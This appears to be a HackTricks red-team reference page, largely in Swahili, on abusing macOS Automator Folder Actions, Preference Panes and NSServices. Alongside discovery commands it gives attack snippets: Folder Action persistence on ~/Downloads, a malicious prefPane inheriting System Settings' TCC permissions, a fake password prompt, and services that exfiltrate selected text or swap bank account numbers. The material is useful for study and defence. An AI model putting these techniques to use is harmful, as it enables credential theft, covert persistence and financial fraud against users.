Matumizi Mabaya ya macOS Automator, Preference Panes & NSServices

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

Automator Actions & Workflows

Taarifa za Msingi

Automator ni zana ya otomatiki yenye kiolesura ya macOS. Inatekeleza workflows (.workflow bundles) zilizoundwa kwa actions (.action bundles). Automator pia inaendesha Folder Actions, Quick Actions, na ujumuishaji wa Shortcuts.

Automator actions ni plugins zinazopakiwa kwenye runtime ya Automator wakati workflow inapoendeshwa. Zinaweza:

  • Kutekeleza shell scripts yoyote
  • Kuchakata faili na data
  • Kushirikiana na applications kupitia AppleScript
  • Kuunganisha pamoja kwa ajili ya otomatiki tata

Kwa Nini Hii ni Muhimu

Warning

Automator workflows can be social-engineered into execution — they appear as simple document files. A .workflow bundle can contain embedded shell commands that execute when the workflow runs. Combined with Folder Actions, they provide automatic persistence that triggers on file events.

Discovery

# Find Automator actions installed on the system
find / -name "*.action" -path "*/Automator/*" -type d 2>/dev/null

# Find user-created workflows
find ~/Library/Services -name "*.workflow" 2>/dev/null
find ~/Library/Workflows -name "*.workflow" 2>/dev/null

# List active Folder Actions
defaults read ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist 2>/dev/null

# Using the scanner
sqlite3 /tmp/executables.db "
SELECT e.path, h.handler_metadata
FROM executables e
JOIN executable_handlers eh ON e.id = eh.executable_id
JOIN handlers h ON eh.handler_id = h.id
WHERE h.handler_type = 'automator_action';"

Attack: Social-Engineered Workflow

Kifurushi cha .workflow kinaonekana kama faili ya kawaida ya hati kwa watumiaji wengi:

# Create a workflow programmatically
mkdir -p /tmp/Evil.workflow/Contents
cat > /tmp/Evil.workflow/Contents/document.wflow << 'PLIST'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AMApplicationBuild</key>
<string>523</string>
<key>AMApplicationVersion</key>
<string>2.10</string>
<key>actions</key>
<array>
<dict>
<key>action</key>
<dict>
<key>AMActionVersion</key>
<string>2.0.3</string>
<key>AMApplication</key>
<array>
<string>Automator</string>
</array>
<key>AMBundleID</key>
<string>com.apple.RunShellScript</string>
</dict>
</dict>
</array>
</dict>
</plist>
PLIST

Attack: Folder Action Persistence

Folder Actions huendesha workflow moja kwa moja wakati faili zinaongezwa kwenye folda inayofuatiliwa:

# Register a Folder Action on ~/Downloads
# Every file the user downloads triggers the workflow

# Method 1: Via AppleScript
osascript -e '
tell application "System Events"
make new folder action at end of folder actions with properties {name:"Downloads", path:(path to downloads folder)}
tell folder action "Downloads"
make new script at end of scripts with properties {name:"Evil", path:"/path/to/evil.workflow"}
end tell
set folder actions enabled to true
end tell'

# Method 2: Via the Folder Actions Setup utility
# Users can be tricked into installing a Folder Action through a .workflow double-click

Caution

Vitendo vya Folda hudumu baada ya kuwasha upya na hufanyika kimya. Kitendo cha Folda kwenye ~/Downloads kinamaanisha kila faili iliyopakuliwa inauamsha payload yako — ikijumuisha faili kutoka Safari, Chrome, AirDrop, na viambatisho vya barua pepe.

Preference Panes

Basic Information

Preference panes (.prefPane bundles) ni plugins zinazopakiwa ndani ya System Settings (zamani System Preferences). Zinatoa paneli za UI za usanidi kwa sifa za mfumo au za wahusika wa tatu.

Why This Matters

  • Preference panes hufanyika ndani ya mchakato wa System Settings, ambao unaweza kuwa na idhini za TCC zilizo juu (accessibility, full disk access katika muktadha fulani)
  • Preference panes za wahusika wa tatu huingizwa katika mchakato huu unaoaminika, zinaurithi muktadha wake wa usalama
  • Watumiaji wanasakinisha preference panes kwa double-clicking — njia rahisi ya social engineering
  • Mara zimesakinishwa, zinaendelea kuwepo na zinapakia kila wakati System Settings inafunguliwa kwenye paneli hiyo

Discovery

# Find installed preference panes
ls /Library/PreferencePanes/ 2>/dev/null
ls ~/Library/PreferencePanes/ 2>/dev/null
ls /System/Library/PreferencePanes/

# Check for non-Apple preference panes (third-party)
find /Library/PreferencePanes ~/Library/PreferencePanes -name "*.prefPane" 2>/dev/null

# Using the scanner
sqlite3 /tmp/executables.db "
SELECT e.path, h.handler_metadata
FROM executables e
JOIN executable_handlers eh ON e.id = eh.executable_id
JOIN handlers h ON eh.handler_id = h.id
WHERE h.handler_type = 'preference_pane';"

Shambulio: Privilege Context Hijacking

Preference pane ya hasidi inarithi muktadha wa usalama wa System Settings:

// Preference pane principal class
@interface MaliciousPrefPane : NSPreferencePane
@end

@implementation MaliciousPrefPane
- (void)mainViewDidLoad {
[super mainViewDidLoad];
// This code runs inside System Settings process
// It has System Settings' TCC permissions

// Example: read files accessible to System Settings
NSData *data = [NSData dataWithContentsOfFile:@"/path/to/protected/file"];

// Example: use Accessibility API if System Settings has it
AXUIElementRef systemWide = AXUIElementCreateSystemWide();
// ... control other applications
}
@end

Attack: Persistence via Installation

# Install a preference pane (user-level, no admin required)
cp -r /tmp/Evil.prefPane ~/Library/PreferencePanes/

# System-level (requires admin)
sudo cp -r /tmp/Evil.prefPane /Library/PreferencePanes/

# The pane loads every time the user opens System Settings and navigates to it
# For better persistence, set it as the default pane

Shambulio: UI Phishing

Jopo la mapendeleo linaweza kuiga paneli halali za UI za mfumo ili phish for credentials:

// Display a fake authentication dialog
NSAlert *alert = [[NSAlert alloc] init];
alert.messageText = @"System Settings needs your password to make changes.";
alert.informativeText = @"Enter your password to allow this.";
[alert addButtonWithTitle:@"OK"];
[alert addButtonWithTitle:@"Cancel"];

NSSecureTextField *passwordField = [[NSSecureTextField alloc] initWithFrame:NSMakeRect(0, 0, 200, 24)];
alert.accessoryView = passwordField;
[alert runModal];

NSString *password = passwordField.stringValue;
// Exfiltrate password...

NSServices

Taarifa za Msingi

NSServices zinawawezesha programu kutoa utendaji kwa programu nyingine kupitia Services menu (bonyeza-kulia → Services). Wakati mtumiaji anapochagua maandishi au data na kuitumia service, data iliyochaguliwa inatumwa kwa mtoa huduma kwa ajili ya usindikaji.

Services zimetangazwa katika Info.plist ya programu chini ya ufunguo wa NSServices na kuandikishwa kwenye pasteboard server (pbs).

Kwa Nini Hii Inajali

  • Services hupokea mtiririko wa data kati ya programu — maandishi yaliyochaguliwa kutoka kwa programu yoyote yanatumwa kwa service
  • Service yenye nia mbaya inaweza kunasa data kutoka kwa meneja wa nywila, programu za barua pepe, au programu za kifedha
  • Services zinaweza kurudisha data iliyorekebishwa kwa programu inayoiita (man-in-the-middle kwenye operesheni za uteuzi)
  • Majina ya service yanaweza kutengenezwa ili yaonekanwe halali (“Format Text”, “Encrypt Selection”, “Share”)

Ugunduzi

# List all registered services
/System/Library/CoreServices/pbs -dump_pboard 2>/dev/null

# Find apps providing services
find /Applications -name "Info.plist" -exec grep -l "NSServices" {} \; 2>/dev/null

# Check specific app's services
defaults read /Applications/SomeApp.app/Contents/Info.plist NSServices 2>/dev/null

# Using the scanner
sqlite3 /tmp/executables.db "
SELECT e.path, h.handler_metadata
FROM executables e
JOIN executable_handlers eh ON e.id = eh.executable_id
JOIN handlers h ON eh.handler_id = h.id
WHERE h.handler_type = 'service';"

Attack: Data Interception Service

<!-- Info.plist NSServices declaration -->
<key>NSServices</key>
<array>
<dict>
<key>NSMessage</key>
<string>processSelection</string>
<key>NSPortName</key>
<string>EvilService</string>
<key>NSSendTypes</key>
<array>
<string>NSStringPboardType</string>
</array>
<key>NSMenuItem</key>
<dict>
<key>default</key>
<string>Format Selected Text</string>
</dict>
</dict>
</array>

// Service handler — receives user-selected text from any application
- (void)processSelection:(NSPasteboard *)pboard
userData:(NSString *)userData
error:(NSString **)error {
NSString *selectedText = [pboard stringForType:NSPasteboardTypeString];

// selectedText contains whatever the user selected in any app
// Could be a password, credit card number, private message, etc.

// Exfiltrate the captured data
[self sendToC2:selectedText];

// Optionally return the text unchanged so user doesn't notice
[pboard clearContents];
[pboard setString:selectedText forType:NSPasteboardTypeString];
}

Attack: Data Modification (Man-in-the-Middle)

Huduma inaweza kubadilisha data iliyorejeshwa wakati ikionekana kutoa kazi halali:

// A "Secure Encrypt" service that actually intercepts and modifies data
- (void)secureEncrypt:(NSPasteboard *)pboard
userData:(NSString *)userData
error:(NSString **)error {
NSString *original = [pboard stringForType:NSPasteboardTypeString];

// Log the original data (credential capture)
[self exfiltrate:original];

// Return modified data (e.g., replace bank account in a wire transfer)
NSString *modified = [original stringByReplacingOccurrencesOfString:@"original-account"
withString:@"attacker-account"];
[pboard clearContents];
[pboard setString:modified forType:NSPasteboardTypeString];
}

Mnyororo ya Mashambulio ya Mbinu Mchanganyiko

Automator Folder Action → Credential Harvesting

1. Install Folder Action on ~/Downloads
2. Workflow scans every downloaded file for credentials/keys
3. grep -r "BEGIN RSA PRIVATE KEY\|password\|token" on each file
4. Exfiltrate findings

Sehemu ya Mapendeleo → Kupandisha cheo kwa TCC

1. Distribute malicious prefPane (social engineering)
2. User double-clicks → installed in ~/Library/PreferencePanes/
3. PrefPane runs inside System Settings context
4. Inherits System Settings' TCC grants
5. Access protected data, control other apps via inherited Accessibility

NSService → Uibi wa Meneja wa Nywila

1. Register a service named "Secure Copy"
2. User selects password in password manager
3. User right-clicks → Services → "Secure Copy"
4. Service receives the password text
5. Exfiltrate while placing it on clipboard normally

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks